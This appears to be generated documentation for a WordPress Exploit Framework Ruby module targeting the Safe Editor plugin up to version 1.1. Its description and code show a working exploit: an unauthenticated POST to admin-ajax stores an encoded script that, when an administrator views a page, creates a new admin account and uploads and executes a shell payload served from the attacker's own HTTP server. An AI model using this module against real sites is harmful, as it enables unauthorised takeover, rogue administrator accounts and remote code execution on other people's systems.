class Wpxf::Exploit::SafeEditorXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::Xss::new
# File lib/wpxf/modules/exploit/xss/stored/safe_editor_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'Safe Editor <= 1.1 XSS Shell Upload',
    desc: 'This module exploits a lack of user level validation and input '\
          'sanitization in versions <= 1.1 of the Safe Editor '\
          'plugin which allows unauthenticated users to store '\
          'a script that will create a new admin user and use the new '\
          'credentials to upload and execute a payload when an admin '\
          'views the page.',
    author: [
      '@robsat91', # Disclosure
      'rastating'  # WPXF module
    ],
    references: [
      ['WPVDB', '8497']
    ],
    date: 'May 17 2016'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/safe_editor_xss_shell_upload.rb, line 28
def check
  check_plugin_version_from_changelog('safe-editor', 'readme.txt', '1.2')
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/xss/stored/safe_editor_xss_shell_upload.rb, line 32
def run
  return false unless super

  emit_info 'Storing script...'
  res = execute_post_request(
    url: wordpress_url_admin_ajax,
    body: {
      'action' => 'se_save',
      'type' => 'js',
      'data' => xss_ascii_encoded_include_script
    }
  )

  if res.nil?
    emit_error 'No response from the target'
    return false
  end

  if res.code != 200
    emit_error "Server responded with code #{res.code}"
    return false
  end

  emit_success 'Script stored and will be executed when a user views a page'
  start_http_server

  xss_shell_success
end